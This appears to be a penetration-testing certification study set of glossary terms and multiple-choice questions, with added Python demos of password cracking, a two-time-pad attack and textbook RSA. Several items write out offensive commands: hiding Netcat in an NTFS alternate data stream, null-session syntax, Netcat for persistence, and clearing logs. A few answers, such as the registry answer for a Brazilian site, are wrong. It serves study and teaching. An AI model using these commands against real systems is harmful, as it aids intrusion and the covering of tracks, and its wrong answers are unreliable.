A topology used by token ring and FDDI networks in which all devices are connected in a ring. Data packets in a ring topology are passed in a deterministic fashion from one device to the next around the ring until they reach the receiver.
Mantrap
A turnstile or other gated apparatus used to detain an individual between a trusted state and an untrusted state for authentication.
Man-in-the-middle attack
A type of attack in which the attacker can read, insert, and change information being passed between two parties without either party knowing that the information has been compromised.
Macro infector
A type of computer virus written in an application's macro language and carried inside documents, such as Word or Excel files. Melissa is the classic example of a macro virus.
Dictionary attack
A type of cryptographic attack in which the attacker uses a word list or dictionary list to try to crack an encrypted password. A newer technique is to use a time/memory trade-off such as in rainbow tables.
Paper test
A type of disaster recovery test that reviews the steps of the test without actually performing the steps. This type of disaster recovery test is normally used to help team members review the proposed plan and become familiar with the test and its objectives.
Role-based access control (RBAC)
A type of nondiscretionary access control in which permissions are assigned to roles and users are placed into those roles to facilitate management. This type of access control is widely used by banks and casinos.
Redundant array of independent disks (RAID)
A type of fault tolerance and performance improvement for disk drives that employs two or more drives in combination.
Anomaly detection
A type of intrusion detection that compares observed behavior with a baseline of normal activity. Unusual patterns are identified as suspicious.
ransomware
A type of malware that encrypts the victim's files and demands a payment, usually in cryptocurrency, in exchange for the decryption key.
Rule-based access control (RBAC)
A type of mandatory (nondiscretionary) access control in which access is granted or denied according to a set of rules defined by the security policy, such as time of day or source address, rather than by the identity of the subject alone. A router ACL is a common example. Sometimes abbreviated RuBAC to distinguish it from role-based access control.
real user monitoring (RUM)
A type of passive monitoring that captures and analyzes every transaction of every application or website user.
synthetic transaction monitoring
A type of proactive monitoring often preferred for websites and applications. It provides insight into the availability and performance of an application and warns of any potential issue before users experience any degradation in application behavior.
Wrapper
A type of program used to bind a Trojan program to a legitimate program. The objective is to trick the user into running the wrapped program and installing the Trojan.
misuse case testing
A type of testing that tests an application to ensure that the application can handle invalid input or unexpected behavior. Also known as negative testing.
Broadcast
A type of transmission used on local and wide area networks in which all devices are sent the information from one host.
File infector
A type of virus that copies itself into executable programs.
Fast infection
A type of virus infection in which the virus infects every file that is opened or accessed, not only those that are executed, so it spreads through a system very quickly.
What is LSASS?
The Local Security Authority Subsystem Service (lsass.exe), a user-mode process on Windows that enforces the local security policy, handles user logons, and holds credential material in memory, which is why it is a frequent target for credential dumping.
Exposure factor
A value calculated by determining the percentage of loss to a specific asset due to a specific threat.
Cryptographic key
A value used in the cryptographic process of encryption or decryption.
Appenders
A virus infection type that places the virus code at the end of the infected file.
Multipartite virus
A virus that attempts to attack both the boot sector and executable files.
Master boot record infector
A virus that infects a master boot record.
Polymorphic virus
A virus that is capable of change and self-mutation.
Prepender
A virus type that adds the virus code to the beginning of existing executables.
Exploit
Code or a technique that takes advantage of a vulnerability in software or hardware to gain access to a system or service; not the vulnerability itself.
Traceroute
A way of tracing the hops (routers) between the source and the target computer you are trying to reach. It sends probes with an increasing TTL and records which router returns each ICMP time-exceeded message, giving the path the packets are taking.
Qualitative analysis
A weighted factor or nonmonetary evaluation and analysis based on a weighting or criticality factor valuation as part of the evaluation or analysis.
Routing information protocol (RIP)
A widely used distance-vector protocol that determines the best route by hop count.
Broadband
A wired or wireless transmission medium capable of supporting a wide range of frequencies, typically from audio up to video frequencies. It can carry multiple signals by dividing the total capacity of the medium into multiple, independent bandwidth channels, with each channel operating on only a specific range of frequencies.
This type of security test usually takes on an adversarial role and looks to see what an outsider can access and control. a. Penetration test b. High-level evaluation c. Network evaluation d. Policy assessment
A. A penetration test can be described as an assessment in which the security tester takes on an adversarial role and looks to see what an outsider can access and control
Black hat Bob would like to redirect his co-worker's traffic to his computer so that he can monitor his co-worker's activities on the Internet. The local area network is fully switched and sits behind a NATing router and a firewall. Which of the following techniques would work best? a. ARP spoofing. b. Black hat Bob should configure his MAC address to be the same as that of the co-worker he would like to monitor. c. DNS spoofing. d. Black hat Bob should configure his IP address to be the same as the default gateway.
A. ARP spoofing is used to redirect traffic on a switched network.
You have just performed an ACK scan and have been monitoring a sniffer while the scan was performed. The sniffer captured the result of the scan as an ICMP type 3 code 13. What does this result mean? a. The firewall is only a router with an ACL. b. The port is open. c. Port knocking is used. d. The port is closed.
A. An ICMP type 3 code 13 is administratively filtered. This type of response is returned from a router when the protocol has been filtered by an ACL.
Which rule means that all ports and applications are turned off, and only the minimum number of applications and services needed to accomplish the organization's goals? a. Deny all b. Principle of least privilege c. Access control list d. Defense in depth
A. Deny all means that by default all ports and services are turned off; then only when a service or application is needed to accomplish a legitimate function of the organization is the service turned on.
Who are the individuals who perform legal security tests while sometimes performing questionable activities? a. Gray hat hackers b. Ethical hackers c. Crackers d. White hat hackers
A. Gray hat hackers are individuals who cross the line between ethical and unethical behavior.
During a security review, you have discovered that there are no documented security policies for the area you are assessing. Which of the following would be the most appropriate course of action? a. Identify and evaluate current practices b. Create policies while testing c. Increase the level of testing d. Stop the audit
A. If no current practices or procedures exist, you should evaluate what type of security practices are actually in place so that you can recommend the correct changes.
Which of the following best describes an attack that altered the contents of two critical files? a. Integrity b. Confidentially c. Availability d. Authentication
A. Integrity provides for the correctness of information. Integrity allows users of information to have confidence in its correctness. Integrity can apply to paper documents as well as electronic ones.
Which of the following is a filtering technique used to drop packets at the routing level, typically done dynamically to respond quickly to DDoS attacks? a. Black hole filtering b. Activity profiling c. Throttling d. Bogon filtering
A. Only black hole filtering can dynamically drop packets at the routing level. Answers B, C, and D are incorrect because, although each can be used to address DoS attacks, they can't dynamically drop packets at the routing level.
Which of the following uses the faster time-memory trade-off technique and works by precomputing all possible passwords in advance? a. Rainbow tables b. Dictionary cracks c. Hybrid cracks d. Brute-force crack
A. Rainbow tables use the faster time-memory trade-off technique and work by precomputing all possible passwords in advance.
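The dictionary and hybrid cracks in the glossary and the time/memory trade-off in this answer, as an added example that is not part of the original set: a dictionary attack with simple mangling rules against unsalted MD5 hashes, the same attack done once up front as a precomputed lookup table, and the effect of a per-user salt. The word list, target hashes and salt are constructed for the demonstration; real rainbow tables compress the lookup table with hash chains, but answer the same question and fail for the same reason.

```python
import hashlib

# Added example (not from the original set): dictionary/hybrid cracking and a
# precomputed lookup table against MD5. Word list, hashes and salt are constructed.

WORDLIST = ["password", "letmein", "summer", "dragon", "welcome"]


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def hybrid_candidates(word: str):
    """A dictionary word plus the mangling rules a hybrid attack applies."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for n in range(100):                    # trailing digits: summer7, Summer42 ...
            yield f"{base}{n}"
    for a, b in (("a", "@"), ("o", "0"), ("e", "3")):   # leet substitutions
        if a in word:
            yield word.replace(a, b)


def dictionary_attack(target_hex: str, wordlist, salt: str = ""):
    """Hash every candidate (with the salt, if any) until one matches the target.

    The salt is prepended here; a real scheme records where and how it is mixed in.
    Cost is paid again for every target, but any salt can be handled.
    """
    for word in wordlist:
        for cand in hybrid_candidates(word):
            if md5hex(salt + cand) == target_hex:
                return cand
    return None


def build_lookup_table(wordlist) -> dict:
    """Precompute hash -> password once; every later crack is a dictionary lookup.

    This is the time/memory trade-off: hashing work is moved ahead of time and
    stored. A salt the table did not anticipate makes the whole table useless.
    """
    return {md5hex(c): c for w in wordlist for c in hybrid_candidates(w)}


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    target = md5hex("Summer42")                  # constructed unsalted hash
    print("dictionary/hybrid crack:", dictionary_attack(target, WORDLIST))
    print("precomputed lookup:     ", table.get(target))
    salted = md5hex("x7!q" + "Summer42")         # constructed per-user salt
    print("lookup vs salted hash:  ", table.get(salted))
    print("re-run with the salt:   ", dictionary_attack(salted, WORDLIST, salt="x7!q"))
```

The lookup table is built once and answers the unsalted hash instantly, but returns nothing for the salted hash; the attacker then has to go back to hashing candidates per salt, which is exactly what a salt is for. A slow, salted password hash (bcrypt, scrypt, Argon2) raises that per-candidate cost further.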
Which of the following sets all TCP flags to zeros? a. nmap -sN 192.168.1.1/24 b. nmap -null 192.168.1.1/24 c. nmap -sX 192.168.1.1/24 d. nmap -sI 192.168.1.1/24
A. Running an -sN (NULL) scan sends packets with all TCP flags turned off (0). Nmap options are case sensitive: lowercase -sn is a ping scan with no port scan at all.
Which of the following is a vulnerability in the Bash shell that was discovered in 2014 and thereafter exploited to launch a range of attacks against Linux and UNIX systems? a. Shellshock b. Heartbleed c. Bashshell d. Poodle
A. Shellshock is a collection of security bugs in the widely used UNIX Bash shell.
Which of the following protocols uses UDP port 514? a. Syslog b. NetBIOS c. Finger d. LDAP
A. Syslog is used for network devices to send event messages to a logging server known as a syslog server. The syslog protocol is supported by a wide range of devices and can be used to log different types of events.
What is the purpose of the following Nmap scan? Nmap -sn 192.168.123.1-254 a. Ping only on the targets, no port scan b. A NULL TCP scan c. A TCP port scan d. Port scan all targets
A. The -sn option tells Nmap not to do a port scan after host discovery and only print out the available hosts that responded to the host discovery probes. This is often known as a "ping scan," but you can also request that traceroute and NSE host scripts be run.
You are about to target a Linux server and would like to attempt access to the passwords. Which of the following folders is where you would find them? a. /etc b. /sbin c. /ect d. /var
A. The /etc folder is the location of many important files in Linux. Two of those files are the passwd and shadow files.
Your ethical hacking firm has been hired to conduct a penetration test. Which of the following documents limits what you can discuss publicly? a. Nondisclosure agreement b. PCI-DSS c. Memorandum of understanding d. Terms of engagement
A. The NDA sets limits on what can or cannot be discussed with others.
You have started a pen test and are starting to resolve domain names. Which of the following is the correct syntax to look for IP addresses? a. host -t a hackthestack.com b. host -t AXFR hackthestack.com c. host -t ns hackthestack.com d. host -t soa hackthestack.com
A. The -t a option queries the A record, which maps a host name to its IPv4 address. AXFR requests a zone transfer, ns returns the name servers, and soa returns the start-of-authority record.
You are trying to establish a null session to a target system. Which is the correct syntax? a. net use \\IP_address\IPC$ "" /u: "" b. net use //IP_address/IPC$ "" \ u: "" c. net use \\IP_address\IPC$ * /u: "" d. net use \\IP_address\IPC$ * \ u: ""
A. The proper syntax is net use \\IP_address\IPC$ "" /u:""
Which DDoS tool uses TCP port 6667? a. Trinity b. Trinoo c. Shaft d. DDoSPing
A. Trinity uses TCP port 6667. Trinoo and Shaft do not use port 6667, and DDoSPing is a scanning tool; therefore, answers B, C, and D are incorrect.
What are the two ICMP types used when performing a ping? a. Type 0 and 8 b. Type 0 and 3 c. Type 3 and 5 d. Type 5 and 11
A. Type 8 is an echo request (the ping) and type 0 is the echo reply. Make sure you know the range of ICMP types for the exam.
Which covert communication program has the capability to bypass router ACLs that block incoming SYN traffic on port 80?
ACKCMD
Which of the following is an example of a covert communication tool?
ACKCMD
Principle of least privilege
The act of giving an entity the least amount of access needed to perform its job and nothing more.
Which of the following is not a valid virus type of infection?
Add-on shell
Trusted computer base (TCB)
All the protection mechanisms within a computer system. This includes hardware, firmware, and software that are responsible for enforcing a security policy.
Spam
Also known as spamming. The use of any electronic communications medium to send unsolicited messages in bulk. Spamming is a major irritation of the Internet era.
Trusted network interpretation (TNI)
Also known as the Red Book. A document that is part of the Rainbow Series.
Rogue access point
An 802.11 access point that has been set up by an attacker for the purpose of diverting legitimate users so that their traffic can be sniffed or manipulated.
Access control list (ACL)
An ACL is a table or list stored by a router to control access to and from a network by helping the device determine whether to forward or drop packets that are entering or exiting it.
Extended binary coded decimal interchange code (EBCDIC)
An IBM-developed 8-bit binary code that can represent 256 characters. It allows control codes and graphics to be represented in a logical format. EBCDIC was created to represent data in particular types of data processing and communications terminal devices.
Heuristic filter
An IDS/IPS and antispam filter technology that uses criteria based on a centralized rule database.
IPsec
An IETF standard used to secure TCP/IP traffic at the network layer. It can be implemented to provide integrity and origin authentication (AH) or integrity plus confidentiality (ESP).
Function point analysis (FPA)
An ISO-approved method as a standard to estimate the complexity of software.
Phreaker
An individual who hacks phone systems or phone-related equipment. Phreakers predate computer hackers.
Honeypot
An Internet-attached server that acts as a decoy, luring in potential hackers in order to study their activities and monitor how they are able to break in to a system.
vulnerability
An absence or a weakness of a countermeasure that is in place.
Discretionary access control (DAC)
An access policy that allows the resource owner to determine access.
COBIT
An acronym for Control Objectives for Information and Related Technology. COBIT is a framework designed by ISACA to aid in IT governance and information security best practices.
active fingerprinting
An active method of identifying the operating system (OS) of a targeted computer or device that involves injecting traffic into the network.
Stateful inspection
An advanced firewall architecture that works at the network and transport layers and keeps track of the state of each connection. Unlike static packet filtering, which examines each packet on its own based on the information in its header, stateful inspection tracks every connection traversing the firewall in a state table and makes sure each packet belongs to a valid, established flow. For example, an inbound DNS reply is allowed only if it matches a DNS request that recently went out.
Confidentiality agreement
An agreement that employees, contractors, or third-party users must read and sign prior to being granted access rights and privileges to the organization's IT infrastructure and its assets.
Warm site
An alternative computer facility that is partially configured and can be made ready in a few days.
Buffer
An amount of memory reserved for the temporary storage of data.
Qualitative assessment
An analysis of risk that places the probability results into terms such as none, low, medium, and high.
Simple network management protocol (SNMP)
An application layer protocol that facilitates the exchange of management information between network devices. Version one uses well-known community strings of public and private.
vulnerability assessment
An assessment method whereby an organization's network is tested for countermeasure absences or other security weaknesses.
Identity theft
An attack in which an individual's personal, confidential, banking, and financial identity is stolen and misused by another individual or individuals. Use of your Social Security number without your consent or permission could result in identity theft.
Exploit
An attack on a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders.
Impact
An attempt to identify the extent of the consequences should a given event occur.
Digital signature
An electronic signature that can be used to authenticate the identity of the sender of a message and to detect tampering. A digital signature is created by hashing the message and encrypting (signing) the hash with the sender's private key; anyone holding the corresponding public key can decrypt the signature and compare the recovered hash with a hash of the received message.
Extensible markup language (XML)
An emerging standard or system for defining, validating, or sharing document formats and data distributed on the Web. XML enables authors to create customized tags that can help them efficiently achieve their goals.
One-time pad
An encryption mechanism in which the key (the pad) is used only once and that is, theoretically, unbreakable. One-time pads function by combining (XORing) the plain text with a truly random pad that is at least as long as the plain text. Reusing a pad destroys the guarantee, because XORing two cipher texts made with the same pad cancels the pad out and leaves the XOR of the two plain texts.
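The "only once" rule, as an added example that is not part of the original glossary: one-time pad encryption, and what an attacker can do when the same pad is used for two messages. The messages and pad are constructed for the demonstration.

```python
import os

# Added example (not from the original glossary): one-time pad encryption and
# the two-time pad failure. Messages and the pad are constructed here.


def make_pad(length: int) -> bytes:
    """A pad must be truly random and at least as long as the message."""
    return os.urandom(length)


def otp_xor(pad: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse). Each pad byte is used once."""
    if len(pad) < len(data):
        raise ValueError("pad shorter than message: never stretch or reuse a pad")
    return bytes(p ^ k for p, k in zip(data, pad))


def two_time_pad_leak(ct1: bytes, ct2: bytes) -> bytes:
    """If one pad encrypted both messages, ct1 XOR ct2 == pt1 XOR pt2.

    The pad cancels out, so the attacker never needs it.
    """
    return bytes(a ^ b for a, b in zip(ct1, ct2))


def recover_other_message(ct1: bytes, ct2: bytes, known_pt1: bytes) -> bytes:
    """Crib-dragging: with the pad reused, knowing (or guessing) one plaintext
    yields the other plaintext directly over the overlapping length."""
    return bytes(x ^ p for x, p in zip(two_time_pad_leak(ct1, ct2), known_pt1))


if __name__ == "__main__":
    m1, m2 = b"ATTACK AT DAWN", b"RETREAT AT DUSK"
    pad = make_pad(max(len(m1), len(m2)))
    c1, c2 = otp_xor(pad, m1), otp_xor(pad, m2)      # the mistake: same pad twice
    print(otp_xor(pad, c1))                            # legitimate decryption
    print(recover_other_message(c1, c2, m1))           # attacker output, no pad needed
```

The same failure applies to any stream cipher whose key stream is reused (for example, a nonce repeated under the same key), which is why nonce management matters as much as the key itself.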
Block cipher
An encryption scheme in which the data is divided into fixed-size blocks (64 bits for DES and Blowfish, 128 bits for AES) and each block is transformed with the key. How the blocks relate to one another depends on the mode of operation: in ECB each block is encrypted independently, whereas chained modes such as CBC make each block depend on the previous one.
Public key encryption
An encryption scheme that uses two mathematically related keys. In an email transaction, the recipient's public key encrypts the data and the corresponding private key decrypts it. The private key is never transmitted or publicized, so confidentiality rests on keeping that one key secret. For digital signatures, the roles are reversed: the sender uses the private key to create the signature, which anyone who has access to the corresponding public key can verify.
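Both directions of public key use described above, and in the digital signature entry, as an added example that is not part of the original glossary: textbook RSA with small Mersenne primes chosen for the demonstration. Real RSA needs moduli of 2048 bits or more and padding (OAEP for encryption, PSS or PKCS#1 v1.5 for signatures), which this omits on purpose to keep the two key roles visible.

```python
import hashlib
from math import gcd

# Added example (not from the original glossary): textbook RSA showing
# public-key encryption and private-key signing. Primes are constructed
# (small Mersenne primes); no padding, so this is illustrative only.

P = 2**61 - 1
Q = 2**89 - 1


def keygen(p: int = P, q: int = Q, e: int = 65537):
    """Return (public key, private key) as (n, e) and (n, d)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(pub, message: bytes) -> int:
    """Encrypt with the recipient's PUBLIC key; only the private key undoes it."""
    n, e = pub
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message too long for this modulus (use hybrid encryption)")
    return pow(m, e, n)


def decrypt(priv, ciphertext: int) -> bytes:
    n, d = priv
    m = pow(ciphertext, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def _digest(n: int, message: bytes) -> int:
    # Sign the hash of the message, never the message itself.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(priv, message: bytes) -> int:
    """The signer applies the PRIVATE key to the message hash."""
    n, d = priv
    return pow(_digest(n, message), d, n)


def verify(pub, message: bytes, signature: int) -> bool:
    """Anyone with the PUBLIC key recovers the hash and compares it to a fresh one."""
    n, e = pub
    return pow(signature, e, n) == _digest(n, message)


if __name__ == "__main__":
    pub, priv = keygen()
    ct = encrypt(pub, b"meet at 0900")
    print(decrypt(priv, ct))
    sig = sign(priv, b"transfer 100")
    print(verify(pub, b"transfer 100", sig), verify(pub, b"transfer 900", sig))
```

Note the asymmetry the glossary entries describe: the key that encrypts a message is public, the key that signs one is private, and in both cases it is the private key that must never leave its owner.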
Symmetric encryption
An encryption standard that requires all parties to have a copy of a shared key. A single key is used for both encryption and decryption.
Registration authority (RA)
An entity responsible for identifying and authenticating the party that requests a PKI certificate. The RA is not responsible for signing or issuing certificates; that is the CA's job. The most common form of certificate is the X.509 standard.
Software bug or software flaw
An error in software coding or its design that can result in software vulnerability.
Assessment
An evaluation and/or valuation of IT assets based on predefined measurement or evaluation criteria. This does not typically require an accounting or auditing firm to conduct an assessment such as a risk or vulnerability assessment.
Expert system
An expert system is a class of computer programs developed by researchers in artificial intelligence during the 1970s and applied commercially throughout the 1980s. In essence, they are programs made up of a set of rules that analyze information (usually supplied by the user of the system) about a specific class of problems, provide an analysis of the problem(s), and, depending on their design, recommend a course of user action to implement corrections.
Materiality
An expression of the relative significance or importance of a particular matter in the context of the organization as a whole.
log review
An important practice to ensure that issues are detected before they become major problems. Computer security logs are particularly important because they can help an organization identify security incidents, policy violations, and fraud.
Ad-hoc mode
An individual computer in ad-hoc operation mode can communicate directly to other client units. No access point is required. Ad-hoc operation is ideal for small networks of no more than 2-4 computers.
CVSS (Common Vulnerability Scoring System)
An industry standard that was created by security practitioners in the Forum of Incident Response and Security Teams (FIRST) to provide the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.
Risk acceptance
An informed decision to suffer the consequences of likely events.
Database-management system (DBMS)
An integrated set of computer programs that provide the capabilities needed to establish, modify, make available, and maintain the integrity of a database.
Internet
An interconnected system of networks that connects computers around the world via the TCP/IP protocol.
Compensating control
An internal control designed to reduce risk or weakness in an existing control.
Bluetooth
An open standard for short-range wireless communications of data and voice between both mobile and stationary devices. Used in cell phones, PDA, laptops, and other devices.
Internet assigned numbers authority (IANA)
An organization dedicated to preserving the central coordinating functions of the global Internet for the public good. Used by hackers and security specialists to track down domain owners and their contact details.
Computer incident response team (CIRT)
An organization developed to provide incident response services to victims of attacks, publish alerts concerning vulnerabilities and threats, and offer other information to help improve organizations' ability to respond to computer and network security issues.
Network operations center (NOC)
An organization's help desk or interface to its end users where trouble calls, questions, and trouble tickets are generated.
Covert channel
An unintended communication path that allows a process to transfer information in such a way that violates a system's security policy.
covert channel
An unintended communication path that enables a process to transfer information in a way that violates a system's security policy.
dynamic testing
Analyzes software security in the runtime environment. With this testing, the tester should not have access to the application's source code.
static testing
Analyzes software security without actually running the software. This is usually provided by reviewing the source code or compiled application.
Threat
Any agent, condition, or circumstance that could potentially cause harm, loss, damage, or compromise to an IT asset or data asset.
Threat
Any agent, condition, or circumstances that could potentially cause harm, loss, damage or compromise to an IT asset or data asset
Queue
Any group of items, such as computer jobs or messages, waiting for service.
Spyware
Any software application that covertly gathers information about a user's Internet usage and activity and then exploits this information by sending adware and pop-up ads similar in nature to the user's Internet usage history.
Data leakage
Any type of computer information loss. This can involve removal of information by CD, floppy, or USB thumb drive, or any other method that allows the removal or leakage of information by stealing computer reports, data, or tapes.
Noise
Any unwanted signal, such as static, that interferes with the clarity of data being transmitted, thus creating the possibility that the receiver will receive a misconstrued message.
Asset
Anything of value owned or possessed by an individual or business
Encapsulation (objects)
As used by layered protocols, a technique that applies to a layer adding header information to the protocol data unit (PDU) from the layer above. Basically, this refers to the capability to cover and seal an object.
In which layer of the OSI model could ARP poisoning occur? a. Network b. Data link c. Session d. Transport
B. ARP poisoning occurs at the data link layer.
Which covert communication program has the capability to bypass router ACLs that block incoming SYN traffic on port 80? a. Loki b. AckCmd c. Stealth Tools d. Firekiller 2000
B. AckCmd uses TCP ACK packets to bypass ACL rules on firewalls. Answers A, C, and D are incorrect because Loki is an ICMP tool, Stealth Tools is a malware wrapper, and Firekiller disables antivirus.
You found the following command on a compromised system: Type nc.exe > readme.txt:nc.exe What is its purpose? a. This command is used to start a Netcat listener on the victim system. b. This command is used to stream Netcat behind readme.txt. c. This command is used to open a command shell on the victim system with Netcat. d. This command is used to unstream Netcat.exe.
B. Alternate data streams are another type of named data stream that can be present within each file. The command streams Netcat behind readme.txt on an NTFS drive.
Which of the following types of biometric systems is considered the most accurate? a. Fingerprint scanning b. Iris scanning c. Voice scanning d. Palm scanning
B. Biometric systems are not all equal when it comes to accuracy. Iris-scanning biometric systems are considered the most accurate.
Which of the following addresses the secrecy and privacy of information? a. Integrity b. Confidentiality c. Availability d. Authentication
B. Confidentiality addresses the secrecy and privacy of information. Physical examples of confidentiality include locked doors, armed guards, and fences. Logical examples of confidentiality include passwords, encryption, and firewalls.
Which type of attack sends fake entries to a DNS server to corrupt the information stored there? a. DNS DoS b. DNS cache poisoning c. DNS pharming d. DNS zone transfer
B. DNS cache poisoning is a technique that tricks your DNS server into believing it has received authentic information when in reality, it has been deceived.
Which of the following tools can be used to clear the Windows logs? a. Auditpol b. ELSave c. PWdump d. Cain and Abel
B. ELSave is used to clear the log files. Other tools used to remove evidence and clear logs include Winzapper and Evidence Eliminator.
During the early stages of a pen test you have attempted to map out the route to a network with Linux traceroute and have not been successful because it seems ICMP is blocked. Which of the following would be a good tool for you to use to attempt to gather additional information? a. Tracert b. Hping c. Ping d. A port scanner
B. Hping can perform traceroute as well as a variety of other mapping functions.
You have captured some packets from a system you would like to passively fingerprint. You noticed that the IP header length is 20 bytes and there is a datagram length of 84 bytes. What do you believe the system to be? a. Windows XP b. Linux c. Windows 7 d. Windows 8
B. Linux. Active fingerprinting works by examining the unique characteristics of each OS. One difference between competing platforms is the datagram length. On a Linux computer, this value is usually 84, whereas Microsoft computers default to 60. Therefore, answers A, C, and D are incorrect because they are all Windows operating systems.
Which of the following is not an example of Martian packets? a. 10.0.0.0 b. 126.0.0.0 c. 224.0.0.0 d. 172.16.0.0
B. Martian packets are packets with unroutable addresses, such as unused IP addresses, loopback addresses, and NAT'd addresses. 126.0.0.0 is a valid address. Answers A, C, and D are incorrect because these are all addresses that are unroutable.
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to local administrator on a second workstation. With this in mind, which of the following is true? a. You have no access. b. You have completed horizontal privilege escalation. c. You will have a RID of 501. d. You have completed vertical privilege escalation.
B. Moving from one local admin account to another local admin account would be an example of horizontal privilege escalation
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to the local administrator on a second workstation. With this in mind, which of the following is true? a. You have no access. b. You have completed horizontal privilege escalation. c. You will have a RID of 501. d. You have completed vertical privilege escalation.
B. Moving from one local admin account to another local admin account would be an example of horizontal privilege escalation.
Which of the following best describes Netcat? a. Netcat is a more powerful version of Snort and can be used for network monitoring and data acquisition. This program enables you to dump the traffic on a network. It can also be used to print out the headers of packets on a network interface that matches a given expression. b. Netcat is called the TCP/IP Swiss army knife. It works with Windows and Linux and can read and write data across network connections using TCP or UDP. c. Netcat is called the TCP/IP Swiss army knife. It is a simple Windows-only utility that reads and writes data across network connections using TCP or UDP. d. Netcat is called the TCP/IP Swiss army knife. It is a simple Linux-only utility that reads and writes data across network connections using TCP or UDP.
B. Netcat is considered the Swiss army knife of hacking tools because it will do so many different things, such as shovel a shell, port scan, grab banners, and transfer files. It works with Windows and Linux.
After two days of work, you successfully exploited a traversal vulnerability and gained root access to a CentOS 6.5 server. Which of the following is the best option to maintain access? a. Install spyware b. Install Netcat c. Disable IPchains d. Add your IP addresses to /etc/hosts
B. Netcat is known for its many uses, such as file transfer and banner grabbing. Netcat can be used to maintain access because it supports the capability to redirect the input and output of a shell to a service so that it can be remotely accessed.
Which of the following is the most important step for the ethical hacker to perform during the pre-assessment? a. Hack the web server. b. Obtain written permission to hack. c. Gather information about the target. d. Obtain permission to hack.
B. Obtain written permission to hack. Ethical hackers must always obtain legal, written permission before beginning any security tests.
ICMP is a valuable tool for troubleshooting and reconnaissance. What is the correct type for a ping request and a ping response? a. Ping request type 5, ping reply type 3 b. Ping request type 8, ping reply type 0 c. Ping request type 3, ping reply type 5 d. Ping request type 0, ping reply type 8
B. Ping is the most common ICMP type. A ping request is a type 8, and a ping reply is a type 0.
You have gone to an organization's website to gather information, such as employee names, email addresses, and phone numbers. Which step of the hacker's methodology does this correspond to? a. Scanning and enumeration b. Reconnaissance c. Fingerprinting d. Gaining access
B. Reconnaissance includes the act of reviewing an organization's website to gather as much information as possible.
One of the members of your security assessment team is trying to find out more information about a client's website. The Brazilian-based site has a .com extension. She has decided to use some online Whois tools and look in one of the Regional Internet Registries. Which of the following represents the logical starting point? a. AfriNIC b. ARIN c. APNIC d. RIPE
B. Regional Internet Registries (RIR) maintain records from the areas from which they govern. ARIN is responsible for domains served within North and South America, and therefore, is the logical starting point for that .com domain.
You're starting a port scan of a new network. Which of the following can be used to scan all ports on the 192.168.123.1 network? a. nmap -p 1,65536 192.168.123.1 b. nmap -p- 192.168.123.1 c. nmap 192.168.123.1 -ports "all" d. nmap -p 0-65536 192.168.123.1
B. Running -p- scans all 65,535 ports on the targeted systems.
Which of following port-scanning techniques can be used to map out the firewall rules on a router? a. NULL scan b. ACK scan c. Inverse flag scan d. Firewalk
B. Running an ACK scan attempts to determine access control list (ACL) rule sets or identify whether stateful firewall inspection or simply stateless filtering is being used. A stateful firewall should return no response. If an ICMP destination unreachable or communication administratively prohibited message is returned, the port is considered to be filtered. If an RST is returned, no firewall is present.
You have been assigned a junior pen tester during a pen test. You performed the following scan: nmap -sL www.example.com Starting Nmap 6.25 ( http://nmap.org ) at 2016-10-12 18:46 Central Daylight Time Host 93.184.216.34 not scanned Your partner asks you to explain the results. Which of the following best describes the correct answer? a. The system was offline. b. The technique only checks DNS and does not scan. c. The syntax is incorrect. d. ICMP is blocked, so no scan is performed.
B. Running the -sL switch checks DNS for a list of IP addresses but does not scan the IP addresses. This technique provides a list of valid IP addresses to scan.
When would an attacker want to begin a session hijacking attack if session fixation is being used? a. At the point that the three-step handshake completes b. Before authentication c. After authentication d. Right before the four-step shutdown
B. Session fixation is an attack that permits an attacker to take control of a valid user session. The attacker must trick the victim into authenticating with a fixed session ID that is given to the victim before he or she authenticates. Answers A, C, and D are incorrect because all three are after authentication and not before.
Setting which IP option enables hackers to specify the path an IP packet would take? a. Routing b. Source routing c. RIP routing d. Traceroute
B. Source routing was designed to enable individuals to specify the route that a packet should take through a network or to allow users to bypass network problems or congestion.
You have gained access to a system. You would now like to hide a file that will be hidden and streamed behind another. Which of the following file systems is required? a. CDFS b. NTFS c. FAT d. FAT32
B. Streams allow files to contain more than one stream of data. In the Windows OS when the NTFS file system is being used, this default data stream is called an alternate data stream, and it allows one file to be hidden behind another.
You would like to perform a scan that runs a script against SSH and attempts to extract the SSH host key. Which of the following is the correct syntax? a. nmap -sC -p21, 111, 139 -T3 www.knowthetrade.com b. nmap -sC -p22, 111, 139 -T4 www.knowthetrade.com c. nmap -sL -p21, 111, 139 -T3 www.knowthetrade.com d. nmap -sI -p22, 111, 139 -T4 www.knowthetrade.com
B. The -sC option runs a script, and the correct port would be 22 because that is the default port that SSH runs on.
As part of a pen test, you have port scanned a Linux system. Listed here is the scan you performed: nmap -sX -vv -P0 192.168.1.123 -p 80. If the system had the specific listening port open, what would be returned? a. RST b. No response c. SYN ACK d. ACK
B. The -sX command means you are running an Xmas tree scan. Per RFC 793, Linux systems will send no response to an open port.
How many steps are in the ARP process? a. 1 b. 2 c. 3 d. 4
B. The ARP process is a two-step process that consists of an ARP request and an ARP reply.
Which DoS attack technique makes use of the Direct Connect protocol? a. ICMP flood b. Peer-to-peer attack c. Application-level attack d. Plashing
B. The only DoS attack listed that uses the DC protocol is the peer-to-peer attack, which targets older versions of the hub software to instruct registered clients to disconnect from the P2P network and connect to a system at the intended target's location.
You have been asked to perform a penetration test for a local company. You have had several meetings with the client and are now almost ready to begin the assessment. Which of the following is the document that would contain verbiage which describes what type of testing is allowed and when you will perform testing and limits your liabilities as a penetration tester? a. Nondisclosure agreement b. Rules of engagement c. Service-level agreement d. Project scope
B. The rules of engagement define what the penetration testing company can or cannot do. It lists the specific actions that are allowable.
